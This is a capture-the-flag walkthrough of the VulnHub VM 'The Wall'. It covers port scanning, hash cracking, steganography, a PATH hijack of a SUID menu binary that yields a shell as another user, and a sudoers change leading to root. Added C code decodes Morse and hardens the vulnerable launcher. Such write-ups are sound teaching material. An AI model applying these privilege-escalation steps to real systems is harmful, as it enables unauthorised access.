The Wall VulnHub Writeup
Xerubus released a new VM recently, named 'The Wall', in tribute to 50 years of Pink Floyd. This is my writeup for it - let's get started!
First things first, an nmap scan. Nada.
I fire up Wireshark and filter on the target's IP address. I notice that every 10 seconds the target attempts to connect back to us on port 1337. My guess is there's some sort of host discovery / connect-back going on on the target.
After listening on port 1337 on my test machine, I wait a few seconds and get a connect back.
$ nc -v -l 0.0.0.0 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.57.104] port 1337 [tcp/*] accepted (family 2, sport 32762)
.u!"`
.x*"`
..+"NP
.z"" ?
M#` 9 , ,
9 M d! ,8P'
R X.:x' R' ,
F F' M R.d'
d P @ E` ,
ss P ' P N.d'
x '' '
X x .
9 .f ! . $b
4; $k / dH $f
'X ;$$ z . MR :$
R M$$, : d9b M' tM
M: #'$L ;' M `8 X MR
`$;t' $F # X ,oR t Q;
$$@ R$ H :RP' $b X @'
9$E @Bd' $' ?X ; W
`M' `$M d$ `E ;.o* :R ..
` ' "' ' @' '$o*"'
The Wall by @xerubus
-= Welcome to the Machine =-
If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice
We simply get kicked out after this message. Checking Wireshark again, I note that an HTTP request was made. I got lucky here - I had attempted to visit the target while nmap was running, and it just so happens the browser attempted (every so often) to reconnect after the first failed attempt.
After visiting port 80, I get a heart-warming image presented to me.
Dawwwh - look at their little faces. I find nothing of interest in the image.
I note from the HTTP response that the server is apparently running on OpenBSD.
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 539
Content-Type: text/html
Date: Fri, 27 Nov 2015 19:37:53 GMT
Last-Modified: Sat, 24 Oct 2015 15:20:23 GMT
Server: OpenBSD httpd
I check the source of the page.
<html>
<body bgcolor="#000000">
<center><img src="pink_floyd.jpg"</img></center>
</body>
</html>
<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall
Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the
riddle, and further claimed that there was an enigma hidden within the artwork.
737465673d3333313135373330646262623337306663626539373230666536333265633035-->
That last string looks like a hex value. After decoding, I get the following.
steg=33115730dbbb370fcbe9720fe632ec05
Another hex value. The key 'steg' stands out. The only other piece of evidence we have so far is the image. I'm guessing there's some information hidden in the image, and this is the key for retrieving it.
The value above looks like an MD5 hash. After putting it into CrackStation, I get a single hit - the phrase 'divisionbell'. I use this as the passphrase when using steghide to extract information from the JPG.
$ steghide extract -p divisionbell -sf evidence-1.jpg
wrote extracted data to "pink_floyd_syd.txt".
$ cat pink_floyd_syd.txt
Hey Syd,
I hear you're full of dust and guitars?
If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0
Roger
Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.
Awesome. So, we've now got a Base64 encoded string (which decodes to 'SydBarrett') and another MD5 hash (which gives a single hit of 'pinkfloydrocks'). The only place we can provide a login currently is the web server, so I attempt to pass in the username 'SydBarrett' with the password 'pinkfloydrocks' as a basic auth pair.
After prodding about, I see that all PHP files appear to return a 403 error. I attempted to provide the login as a basic auth pair, but didn't receive a challenge, so I'm guessing this error is due to file permissions rather than an htpasswd rule.
Running out of options, I decide to run another nmap scan. It really doesn't feel like these credentials can be used on the web server.
$ nmap -p0-65535 -sT -T5 -A -v 192.168.57.104
Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-27 22:32 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating ARP Ping Scan at 22:32
Scanning 192.168.57.104 [1 port]
Completed ARP Ping Scan at 22:32, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:32
Completed Parallel DNS resolution of 1 host. at 22:32, 13.00s elapsed
Initiating Connect Scan at 22:32
Scanning 192.168.57.104 [65536 ports]
Discovered open port 80/tcp on 192.168.57.104
Discovered open port 1965/tcp on 192.168.57.104
Completed Connect Scan at 22:33, 54.18s elapsed (65536 total ports)
Initiating Service scan at 22:33
Scanning 2 services on 192.168.57.104
Completed Service scan at 22:35, 96.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.57.104
NSE: Script scanning 192.168.57.104.
Initiating NSE at 22:35
Completed NSE at 22:35, 7.21s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for 192.168.57.104
Host is up (0.0017s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http OpenBSD httpd
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
1965/tcp open ssh OpenSSH 7.0 (protocol 2.0)
| ssh-hostkey:
| 2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)
|_ 256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:F2:2B:B7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 5.X
OS CPE: cpe:/o:openbsd:openbsd:5
OS details: OpenBSD 5.0 - 5.4
Uptime guess: 0.000 days (since Fri Nov 27 22:35:22 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Randomized
TRACEROUTE
HOP RTT ADDRESS
1 1.72 ms 192.168.57.104
NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.42 seconds
Raw packets sent: 47 (4.644KB) | Rcvd: 11 (612B)
What's that - port 1965 is open, and it's an SSH server? Jackpot.
$ ssh -p 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.57.104 closed.
Crap..
Syd
So we've got a valid login for the system, but it only supports SFTP access. Let's have a sniff around.
$ sftp -P 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Connected to 192.168.57.104.
sftp> ls -alh
drwxr-x--- 0 0 1000 512B Oct 24 21:16 .
drwxr-x--- 0 0 1000 512B Oct 24 21:16 ..
drwxr-xr-x 0 0 1000 512B Oct 24 19:17 .mail
-rw-r--r-- 0 0 1000 1.9K Oct 25 22:56 bio.txt
-rw-r--r-- 0 0 1000 849K Oct 24 17:17 syd_barrett_profile_pic.jpg
sftp> ls -alh .mail
drwxr-xr-x 0 0 1000 512B Oct 24 19:17 .mail/.
drwxr-x--- 0 0 1000 512B Oct 24 21:16 .mail/..
drwxr-xr-x 0 0 1000 512B Nov 11 10:25 .mail/.stash
-rw-r--r-- 0 0 1000 309B Oct 24 19:18 .mail/sent-items
sftp> ls -alh .mail/.stash
drwxr-xr-x 0 0 1000 512B Nov 11 10:25 .mail/.stash/.
drwxr-xr-x 0 0 1000 512B Oct 24 19:17 .mail/.stash/..
-rw-r--r-- 0 0 1000 46.6M Aug 7 15:33 .mail/.stash/eclipsed_by_the_moon
sftp> ls -alh .mail/sent-items
-rw-r--r-- 0 0 1000 309B Oct 24 19:18 .mail/sent-items
There are a few files we can check out here. I download them all and get to work.
bio.txt unsurprisingly has a biography of Syd Barrett, and the JPG is a picture of the good man himself.
The file eclipsed_by_the_moon, however, is an archive.
$ file eclipsed_by_the_moon
eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 00:15:47 2015, from Unix
Within this gzip is a tar - a tar.gz, one might say.
$ tar zxvf eclipsed_by_the_moon.tar.gz
eclipsed_by_the_moon.lsd
$ file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector
So we've got a disk image here. I use foremost to carve out anything of interest.
$ foremost -v eclipsed_by_the_moon.lsd
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File
Foremost started at Fri Nov 27 22:53:46 2015
Invocation: foremost -v eclipsed_by_the_moon.lsd
Output directory: /home/test/Downloads/wall/eclipsed_by_the_moon.exc/output
Configuration file: /etc/foremost.conf
Processing: eclipsed_by_the_moon.lsd
|------------------------------------------------------------------
File: eclipsed_by_the_moon.lsd
Start: Fri Nov 27 22:53:46 2015
Length: 47 MB (49283072 bytes)
Num Name (bs=512) Size File Offset Comment
0: 00000418.jpg 123 KB 214016
*|
Finish: Fri Nov 27 22:53:47 2015
1 FILES EXTRACTED
jpg:= 1
------------------------------------------------------------------
Foremost finished at Fri Nov 27 22:53:47 2015
We've got a single file that foremost managed to extract - an image.
It's Roger! And there's our password - hello_is_there_anybody_in_there.
$ ssh -p1965 RogerWaters@192.168.57.104
RogerWaters@192.168.57.104's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
.u!"`
.x*"`
..+"NP
.z"" ?
M#` 9 , ,
9 M d! ,8P'
R X.:x' R' ,
F F' M R.d'
d P @ E` ,
ss P ' P N.d'
x '' '
X x .
9 .f ! . $b
4; $k / dH $f
'X ;$$ z . MR :$
R M$$, : d9b M' tM
M: #'$L ;' M `8 X MR
`$;t' $F # X ,oR t Q;
$$@ R$ H :RP' $b X @'
9$E @Bd' $' ?X ; W
`M' `$M d$ `E ;.o* :R ..
` ' "' ' @' '$o*"'
$
Roger
What does Mr Waters keep in his home directory, I wonder..
$ ls -alh
total 176
drwx------ 3 RogerWaters RogerWaters 512B Oct 28 09:29 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 RogerWaters RogerWaters 87B Oct 24 17:35 .Xdefaults
-rw-r--r-- 1 RogerWaters RogerWaters 773B Oct 24 17:35 .cshrc
-rw-r--r-- 1 RogerWaters RogerWaters 103B Oct 24 17:35 .cvsrc
-rw-r--r-- 1 RogerWaters RogerWaters 398B Oct 26 04:01 .login
-rw-r--r-- 1 RogerWaters RogerWaters 175B Oct 24 17:35 .mailrc
-rw-r--r-- 1 RogerWaters RogerWaters 218B Oct 24 17:35 .profile
drwx------ 2 RogerWaters RogerWaters 512B Oct 26 03:56 .ssh
-rw-r--r-- 1 RogerWaters RogerWaters 2.8K Oct 26 08:57 bio.txt
-rw-r--r-- 1 RogerWaters RogerWaters 0B Oct 28 05:02 mbox
-rw-r--r-- 1 RogerWaters RogerWaters 47.0K Oct 26 06:16 roger_waters_profile_pic.jpg
-rw-r--r-- 1 RogerWaters RogerWaters 16.2K Oct 26 06:23 secret-diary
After some time digging through Roger's personal items, I check out the other users on the system - no surprises here.
$ ls -lah /home
total 28
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 .
drwxr-xr-x 13 root wheel 512B Oct 24 18:03 ..
drwx------ 4 DavidGilmour DavidGilmour 512B Oct 28 09:28 DavidGilmour
drwx------ 3 NickMason NickMason 512B Aug 8 00:33 NickMason
drwx------ 3 RichardWright RichardWright 512B Nov 27 02:02 RichardWright
drwx------ 3 RogerWaters RogerWaters 512B Oct 28 09:29 RogerWaters
drwxr-xr-x 4 root SydBarrett 512B Oct 24 18:03 SydBarrett
What was a nice surprise is that two of these users own binaries with the SUID bit set.
$ find / -user NickMason 2>/dev/null
/home/NickMason
/usr/local/bin/brick
$ ls -lah /usr/local/bin/brick
-rws--s--x 1 NickMason NickMason 7.1K Aug 8 00:33 /usr/local/bin/brick
$ find / -user DavidGilmour 2>/dev/null
/home/DavidGilmour
/usr/local/bin/shineon
$ ls -lah /usr/local/bin/shineon
-rwsr-s--- 1 DavidGilmour RichardWright 7.3K Oct 25 07:58 /usr/local/bin/shineon
Looks like we've got our next step. Seeing as we're only able to execute one of these binaries, let's move on.
The Wall
I go ahead and execute /usr/local/bin/brick.
$ /usr/local/bin/brick
What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!
Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ whoami
NickMason
Well, that was unexpected, but welcome. We're now one with Nick.
Nick Mason
After logging in, I have a bit of a dig about.
$ ls -alh /home/NickMason/
total 1576
drwx------ 3 NickMason NickMason 512B Aug 8 00:33 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 NickMason NickMason 87B Oct 24 17:34 .Xdefaults
-rw-r--r-- 1 NickMason NickMason 773B Oct 24 17:34 .cshrc
-rw-r--r-- 1 NickMason NickMason 103B Oct 24 17:34 .cvsrc
-rw-r--r-- 1 NickMason NickMason 398B Oct 24 17:34 .login
-rw-r--r-- 1 NickMason NickMason 175B Oct 24 17:34 .mailrc
-rw-r--r-- 1 NickMason NickMason 218B Oct 24 17:34 .profile
drwx------ 2 NickMason NickMason 512B Oct 28 04:48 .ssh
-rw-r--r-- 1 NickMason NickMason 1.3K Oct 26 08:58 bio.txt
-rw-r--r-- 1 NickMason NickMason 0B Oct 28 05:02 mbox
-rw-r--r-- 1 NickMason NickMason 749K Aug 8 00:33 nick_mason_profile_pic.jpg
$ cat bio.txt
"Nicholas Berkeley "Nick" Mason (born 27 January 1944) is an English musician and composer, best known as the drummer of Pink Floyd. He is the only constant member of the band since its formation in 1965. Despite solely writing only a few Pink Floyd songs, Mason has co-written some of Pink Floyd's most popular compositions such as "Echoes" and "Time".
Mason is the only Pink Floyd member to be featured on every one of their albums. It is estimated that as of 2010, the group have sold over 250 million records worldwide,[1][2] including 75 million units sold in the United States.
He competes in auto racing events, such as the 24 Hours of Le Mans.
On 26 November 2012, Mason received an Honorary Doctor of Letters from the University of Westminster at the presentation ceremony of the School of Architecture and Built Environment (he had studied architecture at the University's predecessor, Regent Street Polytechnic, 1962-1967)."
I wander if anyone is reading these bio's? Richard Wright.. if you're reading this, I'm not really going to cut you into little pieces. I was just having a joke. Anyhow, I have now added you to thewall. You're username is obvious. You'll find your password in my profile pic.
Source: Wikipedia (https://en.wikipedia.org/wiki/Nick_Mason)
Read that bio carefully..yeah..
I copy out the profile image and try to open it up.. turns out it is not a profile pic at all.
$ file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I
After listening to the playback, I can hear some Morse code in the background.
.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-
This translates to..
RICHARDWRIGHT1943FARFISA
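For anyone who would rather not decode by ear, here is a small table-driven Morse decoder added to this writeup (not a tool the VM ships). It handles the edge cases a hand translation trips over: runs of separator spaces, a "/" word break, and unknown tokens, which come out as '?'. The sequence from the audio is embedded as the sample input.

```c
#include <stdio.h>
#include <string.h>

/* International Morse table, indexed A-Z then 0-9. */
static const char *const MORSE[36] = {
    ".-", "-...", "-.-.", "-..", ".", "..-.", "--.", "....", "..", ".---",
    "-.-", ".-..", "--", "-.", "---", ".--.", "--.-", ".-.", "...", "-",
    "..-", "...-", ".--", "-..-", "-.--", "--..",
    "-----", ".----", "..---", "...--", "....-", ".....", "-....", "--...", "---..", "----."
};

/* Map one dot/dash token to its character; '?' if it is not in the table. */
static char morse_symbol(const char *tok, size_t len) {
    for (int i = 0; i < 36; i++) {
        if (strlen(MORSE[i]) == len && strncmp(MORSE[i], tok, len) == 0)
            return i < 26 ? (char)('A' + i) : (char)('0' + (i - 26));
    }
    return '?';
}

/* Decode a space-separated Morse string into out (capacity outcap, NUL-terminated).
   A lone "/" token is a word break and becomes a space.
   Returns the number of characters written, or -1 if out is too small. */
int morse_decode(const char *in, char *out, size_t outcap) {
    size_t n = 0;
    const char *p = in;
    while (*p) {
        while (*p == ' ') p++;            /* skip any run of separators */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != ' ') p++;      /* one dot/dash token */
        size_t len = (size_t)(p - start);
        if (n + 1 >= outcap) return -1;   /* keep room for the terminator */
        if (len == 1 && *start == '/')
            out[n++] = ' ';
        else
            out[n++] = morse_symbol(start, len);
    }
    out[n] = '\0';
    return (int)n;
}

/* The sequence heard in nick_mason_profile_pic.jpg, as quoted in the writeup. */
static const char *const NICK_MORSE =
    ".-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-";

int main(void) {
    char buf[64];
    if (morse_decode(NICK_MORSE, buf, sizeof buf) < 0) return 1;
    printf("%s\n", buf);   /* prints RICHARDWRIGHT1943FARFISA */
    return 0;
}
```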
After a number of attempts, I hit on the right password for the user - 1943farfisa. Annoyingly, you cannot SSH in as the RichardWright user - you can only su to it from another user on the system.
Richard Wright
Before we check out the binary we found previously, I have a sniff around Richard's home directory.
$ ls -alh
total 84
drwx------ 3 RichardWright RichardWright 512B Nov 27 02:02 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 RichardWright RichardWright 87B Oct 24 17:35 .Xdefaults
-rw-r--r-- 1 RichardWright RichardWright 773B Oct 24 17:35 .cshrc
-rw-r--r-- 1 RichardWright RichardWright 103B Oct 24 17:35 .cvsrc
-rw-r--r-- 1 RichardWright RichardWright 398B Oct 24 17:35 .login
-rw-r--r-- 1 RichardWright RichardWright 175B Oct 24 17:35 .mailrc
-rw-r--r-- 1 RichardWright RichardWright 218B Oct 24 17:35 .profile
drwx------ 2 RichardWright RichardWright 512B Oct 28 09:29 .ssh
-rw-r--r-- 1 RichardWright RichardWright 2.2K Oct 26 09:00 bio.txt
-rw-r--r-- 1 RichardWright RichardWright 990B Oct 27 01:46 mbox
-rw-r--r-- 1 RichardWright RichardWright 17.8K Oct 27 01:52 richard_wright_profile_pic.jpg
The bio contains standard stuff, and the profile picture..well, it's a profile picture.
It appears that Richard has mail.
$ cat mbox
From DavidGilmour@thewall.localdomain Tue Oct 27 01:41:18 2015
Return-Path: DavidGilmour@thewall.localdomain
Delivered-To: RichardWright@thewall.localdomain
Received: from localhost (thewall.localdomain [local])
by thewall.localdomain (OpenSMTPD) with ESMTPA id 3ad74b19
for <RichardWright@thewall.localdomain>;
Tue, 27 Oct 2015 01:41:18 +1000 (AEST)
From: David Gilmour <DavidGilmour@thewall.localdomain>
Date: Tue, 27 Oct 2015 02:41:18 +1000 (AEST)
Message-Id: <9059884549097248741.enqueue@thewall.localdomain>
To: RichardWright@thewall.localdomain
Subject: Re: Brain Damage
Status: RO
G'day Rick.. how's the ivory tickling going?
There's plenty of bricks in the wall, so I'll give you a few when we catch up.
For now, just use that command I gave you with the menu.
Dave
----------
Hey Dave,
I feel like we're back in the studio for The Dark Side of the Moon.
Sorry to keep bugging you, but can you tell me again how to do things
when I'm on thewall.
Rick
This email references a command - I'm guessing that's the binary we found earlier. Let's check it out.
$ /usr/local/bin/shineon
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
After calling strings on the binary, I can see that one of the commands it runs is not given as an absolute path - mail. A rather crude way of finding the vulnerability, but effective.
$ strings /usr/local/bin/shineon
/usr/libexec/ld.so
OpenBSD
OpenBSD
libc.so.80.1
printf
__stack_smash_handler
__srget
getc
puts
system
_thread_atfork
environ
__progname
__cxa_atexit
__sF
__isthreaded
scanf
_Jv_RegisterClasses
__got_start
__got_end
__data_start
_edata
__bss_start
__progname_storage
__fini
__init_tcb
QRP1
[^_]
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail
Creating a symbolic link named mail in the /tmp directory, then prepending /tmp to PATH, I can get a shell as David Gilmour.
$ ln -s /bin/sh /tmp/mail
$ export PATH=/tmp:$PATH
$ /usr/local/bin/shineon
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ cd
mail: cd: /home/RichardWright - Permission denied
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
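The root cause is a SUID/SGID program running a command through the caller's PATH. As an added illustration (shineon's source is never shown in this writeup, so this is not its code), the C below rebuilds the menu table from the strings output, audits which entries a PATH hijack could redirect, and puts a hardened launcher beside the weak system() pattern. The /usr/bin/mail location and the minimal environment contents are my assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Menu entries as they appear in the strings() output. Three are absolute
   paths; the fourth is a bare "mail", resolved through the caller's PATH. */
typedef struct { const char *title; const char *cmd; } menu_item;

static const menu_item ITEMS[] = {
    { "Time - The Dark Side of the Moon",        "/usr/bin/cal" },
    { "Echoes - Meddle",                          "/usr/bin/who" },
    { "Is There Anybody Out There? - The Wall",  "/sbin/ping -c 3 www.google.com" },
    { "Keep Talking- The Division Bell",         "mail" },
};
#define NITEMS (sizeof ITEMS / sizeof ITEMS[0])

/* 1 if the program in a command string is given as an absolute path. */
int command_is_absolute(const char *cmd) {
    return cmd != NULL && cmd[0] == '/';
}

/* Audit: count menu entries that a PATH hijack could redirect. */
int count_path_resolved(void) {
    int n = 0;
    for (size_t i = 0; i < NITEMS; i++)
        if (!command_is_absolute(ITEMS[i].cmd)) n++;
    return n;   /* 1 for the table above: "mail" */
}

/* Weak form: the pattern the writeup exploits. system() hands the string to
   /bin/sh, which looks "mail" up in PATH, and a SUID/SGID process inherits
   PATH from whoever ran it. */
int run_weak(const menu_item *item) {
    puts(item->title);
    return system(item->cmd);
}

/* Hardened form: exec a fixed absolute path with an explicit argv, a minimal
   environment built here rather than inherited, and the caller's real identity
   restored first, so nothing from the invoking environment is trusted. */
int run_fixed(const char *path, char *const argv[]) {
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };  /* assumed */
    if (!command_is_absolute(path)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Drop the elevated effective ids before running anything else. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        execve(path, argv, clean_env);
        _exit(127);                    /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    printf("menu entries resolved through PATH: %d\n", count_path_resolved());
    /* Hardened replacement for option 4; /usr/bin/mail is an assumed location. */
    char *const mail_argv[] = { "mail", NULL };
    int rc = run_fixed("/usr/bin/mail", mail_argv);
    printf("mail exited with %d\n", rc);
    return 0;
}
```

Note that run_fixed refuses a relative program name outright, so the "mail" entry cannot even be passed to it unfixed.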
On to the man of the hour.
David Gilmour
Once again, I check out his home directory.
$ cd /home/DavidGilmour/
$ ls -lah
total 408
drwx------ 4 DavidGilmour DavidGilmour 512B Oct 28 09:28 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 DavidGilmour DavidGilmour 87B Oct 24 17:36 .Xdefaults
-rw-r--r-- 1 DavidGilmour DavidGilmour 773B Oct 24 17:36 .cshrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 103B Oct 24 17:36 .cvsrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 398B Oct 24 17:36 .login
-rw-r--r-- 1 DavidGilmour DavidGilmour 175B Oct 24 17:36 .mailrc
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 26 11:44 .private
-rw-r--r-- 1 DavidGilmour DavidGilmour 218B Oct 24 17:36 .profile
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 28 05:16 .ssh
-rw------- 1 DavidGilmour DavidGilmour 384B Aug 8 00:33 anotherbrick.txt
-rw-r--r-- 1 DavidGilmour DavidGilmour 1022B Oct 26 08:59 bio.txt
-rwxr----- 1 DavidGilmour DavidGilmour 178K Oct 28 08:50 david_gilmour_profile_pic.jpg
-rw-r--r-- 1 DavidGilmour DavidGilmour 785B Oct 27 01:43 mbox
There's nothing of real interest here, apart from the file anotherbrick.txt.
$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond
New website for review: pinkfloyd1965newblogsite50yearscelebration-temp/index.php
# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs
Upon reflection, we could have bypassed these steps entirely by reading this path from /etc/httpd.conf.org, but that wouldn't have been any fun now, would it?
As a matter of procedure, I check the profile image for strings.
who_are_you_and_who_am_i
This looks like a password to me. I try to use it to log in as DavidGilmour.
$ login
login: DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)
Let's move on to this URL.
50 Years of the Floyd
Upon visiting the URL, we're presented with a lovely page, dedicated to 50 Years of Pink Floyd.
The menu items here link to index.php, with a parameter of 'page'.
<li><a href="?page=home">Home</a></li>
<li><a href="?page=about">About</a></li>
<li><a href="?page=albums">Albums</a></li>
<li><a href="?page=contact">Contact</a></li>
My first guess is an LFI vulnerability. After numerous attempts, I move away from the web application, as I can't seem to get anything of use out of it.
I start exploring the filesystem, including the web root. From this, we find a previously unknown directory named 'welcometothemachine'.
$ ls -alh /var/www/htdocs/welcometothemachine
total 24
drwxr-xr-x 2 root welcometothemachine 512B Aug 8 00:33 .
drwxr-x--- 4 www welcometothemachine 512B Nov 27 01:47 ..
-rws--s--- 1 root welcometothemachine 7.3K Nov 27 01:47 PinkFloyd
OK - all that we can do is run this binary.
$ /var/www/htdocs/welcometothemachine/PinkFloyd
/var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: test
Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
Either we need to exploit this, or we need to guess the password.
After performing some enumeration, it appears to crash after receiving more than 50 characters of input.
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
Abort trap
Unfortunately, the option that prevents core dumps on SUID binaries is enabled.
$ sysctl kern.nosuidcoredump
kern.nosuidcoredump=1
I was stuck on this stage for quite some time. After going back over my notes, and checking all the evidence, I noticed that I hadn't actually taken a look at the image from the last web page.
Now, I found nothing of interest in the EXIF data, but I noticed an abnormality at the bottom of the image. After modifying the levels slightly in GIMP, we see the following.
My first thought was that this was an MD5 hash, but it is actually a hex representation of a string.
50696e6b466c6f796435305965617273 = PinkFloyd50Years
I try using this as the password for the above binary, but receive the 'Denied' message again. I proceed to try the hex string itself, and am met by a different message!
$ /var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273
Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless
Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!
Unsure as to what this actually did, I look for any files that have been modified within the past 10 minutes.
$ find / -mmin -10 2>/dev/null
/home/RogerWaters
/dev/bpf0
/dev/ttyp0
/dev/ptyp0
/dev/null
/etc/sudoers
/var/cron/log
/var/db/dhclient.leases.pcn0
/var/log/daemon
/var/log/messages
So, the sudoers file has been updated. I re-check our sudo permissions.
$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"
User DavidGilmour may run the following commands on thewall:
(ALL) SETENV: ALL
Boo-ya! We can use sudo to execute any command, as any user. Time to get our flag.
$ sudo su
# cd /root
# ls -lah
total 48
drwx------ 5 root wheel 512B Nov 27 02:04 .
drwxr-xr-x 14 root wheel 512B Oct 24 18:03 ..
-rw-r--r-- 1 root wheel 87B Aug 16 18:25 .Xdefaults
-rw-r--r-- 1 root wheel 578B Aug 16 18:25 .cshrc
-rw-r--r-- 1 root wheel 94B Aug 16 18:25 .cvsrc
-rw-r--r-- 1 root wheel 328B Aug 16 18:25 .login
-rw-r--r-- 1 root wheel 468B Aug 16 18:25 .profile
drwx------ 2 root wheel 512B Nov 27 05:01 .ssh
-rw-r--r-- 1 root wheel 2.7K Nov 27 01:07 flag.txt
drwxr-xr-x 2 root wheel 512B Nov 14 02:43 scripts
drwxr-xr-x 2 root wheel 512B Oct 27 03:10 tmp
# cat flag.txt
"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"
Congratulations on rooting thewall!
___________________________________________________________________
| | | | | | | | | | |
|_|_______|_______|______ '__ ___|_______|_______|_______|_______|_|
| | | | | ) / | | | |
|_____|_______|_______|__ |,' , . | | _ , ___|_______|_______|_____|
| | | | ,| | |\ | | ,' | | | | |
|_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
| | | | \ _' ' ` | \ | | | |
